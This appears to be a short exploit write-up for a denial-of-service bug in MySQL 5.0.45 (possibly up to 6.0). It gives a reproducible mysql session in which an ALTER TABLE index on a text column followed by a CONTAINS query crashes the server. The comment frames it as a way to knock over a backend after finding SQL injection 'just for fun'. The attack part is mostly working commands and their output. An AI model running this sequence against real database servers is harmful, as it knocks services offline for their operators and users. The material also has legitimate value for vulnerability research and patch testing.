mysql 5.0.45 （修改）拒绝服务漏洞

/* 

* MySQL <=6.0 possibly affected 

* Kristian Erik Hermansen 

* Credit: Joe Gallo 

* You must have Alter permissions to exploit this bug! 

* Scenario: You found SQL injection, but you want to punch backend server 

* in the nuts just for fun. Start with the Alter TABLE statement on 

* a table and field you know to exist. The first two SQL statements are 

* simply to demostrate reproducibility... 

*/ 

 

<snip> 

mysql> Create TABLE `test` ( 

`id` int(10) unsigned NOT NULL AUTO_INCREMENT PRIMARY KEY, 

`foo` text NOT NULL 

) ENGINE=InnoDB DEFAULT CHARSET=latin1; 

Query OK, 0 rows affected 

 

mysql> Select * FROM test Where CONTAINS(foo, ''bar''); 

Empty set 

 

mysql> Alter TABLE test ADD INDEX (foo(100)); 

Query OK, 0 rows affected 

Records: 0 Duplicates: 0 Warnings: 0 

 

mysql> Select * FROM test Where CONTAINS(foo, ''bar''); 

ERROR 2013 : Lost connection to MySQL server during query 

</snip>